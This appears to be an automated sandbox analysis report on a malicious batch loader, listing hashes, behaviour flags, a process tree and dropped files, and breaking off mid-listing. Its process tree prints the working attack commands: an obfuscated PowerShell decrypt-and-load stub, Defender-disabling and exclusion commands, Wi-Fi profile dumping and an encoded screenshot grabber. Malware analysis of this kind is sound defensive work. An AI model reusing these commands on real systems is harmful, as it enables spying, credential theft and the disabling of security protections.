Overview

overview

8

Static

static

1

Cydex Loader.bat

windows10-2004-x64

8

Analysis

  • max time kernel
    149s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/07/2024, 02:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Cydex Loader.bat

  • Size

    13.0MB

  • MD5

    fd5e34bb3be950c5d99328d838c90fec

  • SHA1

    4ae0bf222014e8ddd1b897f2196b535c5d5aabcb

  • SHA256

    d8f5a306f726f64899ff24c1fbd7be438093ef89bed6ef8cec9fa0494f1b90d7

  • SHA512

    da68361bf220bc719920c9162e7295fff5fcbd3daa5e16bf36fb50ebc8cfa81747e016455f2ab4941f2527d06cc169991ef9f3ba036a7a62a3a27c8534730e28

  • SSDEEP

    49152:YuUvQg4JoDocb7J+qkGyye2opfp+xtvwP6Tb2QSBn+3nSJRa7d5oj2vO2Y4yUiiF:Y1

Score
8/10
executionpersistenceprivilege_escalationspyware

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Drops file in Drivers directory 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 23 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Windows\system32\wbem\wmiprvse.exe
      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      2⤵
        PID:5064
      • C:\Windows\system32\backgroundTaskHost.exe
        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
        2⤵
          PID:3252
        • C:\Windows\system32\BackgroundTransferHost.exe
          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
          2⤵
            PID:1444
          • C:\Windows\system32\backgroundTaskHost.exe
            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            2⤵
              PID:844
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              2⤵
                PID:4964
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                2⤵
                  PID:4948
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS -p
                1⤵
                  PID:908
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                  1⤵
                    PID:964
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                    1⤵
                      PID:512
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                      1⤵
                        PID:620
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:440
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1036
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                            1⤵
                              PID:1076
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                              1⤵
                                PID:1096
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                1⤵
                                  PID:1184
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                    PID:1204
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1332
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1340
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1356
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                          1⤵
                                            PID:1368
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                            1⤵
                                              PID:1392
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1556
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                1⤵
                                                  PID:1564
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1636
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                    1⤵
                                                      PID:1692
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1756
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                        1⤵
                                                          PID:1788
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:1856
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1864
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                              1⤵
                                                                PID:1928
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                1⤵
                                                                  PID:1996
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                  1⤵
                                                                    PID:2064
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                    1⤵
                                                                      PID:2080
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2188
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                      1⤵
                                                                        PID:2260
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                        1⤵
                                                                          PID:2424
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2432
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                            1⤵
                                                                            • Drops file in System32 directory
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:2620
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2640
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2704
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2712
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:3036
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:3188
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3396
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of UnmapMainImage
                                                                                        PID:3464
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cydex Loader.bat"
                                                                                          2⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3232
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O4mKwgT14Jf4GENcRygUG/d4BtYwQICwFCslZ/2DwpA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+iqDLVr+MkpW6N2Dl88sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gDOoY=New-Object System.IO.MemoryStream(,$param_var); $PYRCo=New-Object System.IO.MemoryStream; $UyrQy=New-Object System.IO.Compression.GZipStream($gDOoY, [IO.Compression.CompressionMode]::Decompress); $UyrQy.CopyTo($PYRCo); $UyrQy.Dispose(); $gDOoY.Dispose(); $PYRCo.Dispose(); $PYRCo.ToArray();}function execute_function($param_var,$param2_var){ $hsmns=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AqQxc=$hsmns.EntryPoint; $AqQxc.Invoke($null, $param2_var);}$oCUbh = 'C:\Users\Admin\AppData\Local\Temp\Cydex Loader.bat';$host.UI.RawUI.WindowTitle = $oCUbh;$MzdzK=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oCUbh).Split([Environment]::NewLine);foreach ($PIGwG in $MzdzK) { if ($PIGwG.StartsWith('hbEHolpLBZhWCglFYGUC')) { $ubKDq=$PIGwG.Substring(20); break; }}$payloads_var=[string[]]$ubKDq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                            3⤵
                                                                                              PID:3948
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                              3⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in Drivers directory
                                                                                              • Adds Run key to start application
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2532
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +h +s C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                4⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Views/modifies file attributes
                                                                                                PID:2184
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Add-MpPreference -ExclusionPath C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                4⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:2828
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                4⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:2996
                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                wmic os get Caption
                                                                                                4⤵
                                                                                                  PID:924
                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                  wmic cpu get Name
                                                                                                  4⤵
                                                                                                    PID:1748
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                    4⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:4160
                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                    wmic path win32_VideoController get name
                                                                                                    4⤵
                                                                                                    • Detects videocard installed
                                                                                                    PID:2148
                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                    wmic csproduct get UUID
                                                                                                    4⤵
                                                                                                      PID:4020
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                      4⤵
                                                                                                      • Drops file in Drivers directory
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:4896
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                      4⤵
                                                                                                      • Drops file in Drivers directory
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:4964
                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                      netsh wlan show profiles
                                                                                                      4⤵
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      PID:1452
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:3148
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y0usiqio\y0usiqio.cmdline"
                                                                                                        5⤵
                                                                                                          PID:5076
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES431.tmp" "c:\Users\Admin\AppData\Local\Temp\y0usiqio\CSCFC90D99ABC045BC82CACA452B74165.TMP"
                                                                                                            6⤵
                                                                                                              PID:4760
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3600
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:4548
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                        1⤵
                                                                                                          PID:2296
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                          1⤵
                                                                                                            PID:1440
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                            1⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:1304
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                            1⤵
                                                                                                              PID:3652
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                              1⤵
                                                                                                                PID:764

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                SHA1

                                                                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                SHA256

                                                                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                SHA512

                                                                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                Filesize

                                                                                                                944B

                                                                                                                MD5

                                                                                                                6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                                                                SHA1

                                                                                                                c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                                                                SHA256

                                                                                                                2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                                                                SHA512

                                                                                                                60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                Filesize

                                                                                                                944B

                                                                                                                MD5

                                                                                                                62d94562013cad250e309b4091503254

                                                                                                                SHA1

                                                                                                                f658f6e53e980694f5ff5bae10455c21ee059a2e

                                                                                                                SHA256

                                                                                                                1ff2d02730e490230262e82169d667b1db011b405f53b3bb4345ed1ee3efc1d5

                                                                                                                SHA512

                                                                                                                282e6777407b759ba15e7410cefc8652ae362a5e9ae13dfb355a3044154ca018a8de2b98df0e83012ae98279480ee3b517c62d33c8122f078ea5f3732aaa2a97

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RES431.tmp
                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                fb93d15c1450dd17fb3864a9de6ff3c9

                                                                                                                SHA1

                                                                                                                b83d2aedf0bec9757fde8df74d35fefcdf82dc06

                                                                                                                SHA256

                                                                                                                377769fb875148133467e39fb4edb154b4de766acd8b57c76359a7f48dec7ce5

                                                                                                                SHA512

                                                                                                                a7abbc4b005be7df9c3e2593559d69ceb6effc17fcb4332d9368dee11f86c24c713ae39b06978b6d195e3dc7f822c7baee2bed54b3aaa730063c3c925f070657

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3bkf24v.1ah.ps1
                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\kSW0dTBqF5\Display (1).png
                                                                                                                Filesize

                                                                                                                434KB

                                                                                                                MD5

                                                                                                                ab8cc043ba15e2deb92c7d6c6c062a7c

                                                                                                                SHA1

                                                                                                                02b97581e232e206000ba914c4dd6f052a08479f

                                                                                                                SHA256

                                                                                                                b67d9cff987979f49c14eaca055d8a476799f724fdb57e53045f06531260542e

                                                                                                                SHA512

                                                                                                                d586e4efcec2d0838145eac2d77c7b2220b8233a2301887d27eb857dbac23637bc554094d130facb58b39324177699daae69ed50109596f90d134d3922a4d3ba

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\y0usiqio\y0usiqio.dll
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                MD5

                                                                                                                be49a8700c8e2387466acfb4b460254d

                                                                                                                SHA1

                                                                                                                cfd412da9dd01ce05c4004da804e1c15aa5e1971

                                                                                                                SHA256

                                                                                                                2724830f790ee55a37f0437714a3e34a5a930421584053772128015a59a1aa23

                                                                                                                SHA512

                                                                                                                72fdac4f19bed663086cce358b71ae22e171e874018ee7a03b83939bfe63492c2ac0d27e0bbc0baa8c5d84992a2416cf3848cdcb08385d37abf01b4dded506ae

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                Filesize

                                                                                                                442KB

                                                                                                                MD5

                                                                                                                04029e121a0cfa5991749937dd22a1d9

                                                                                                                SHA1

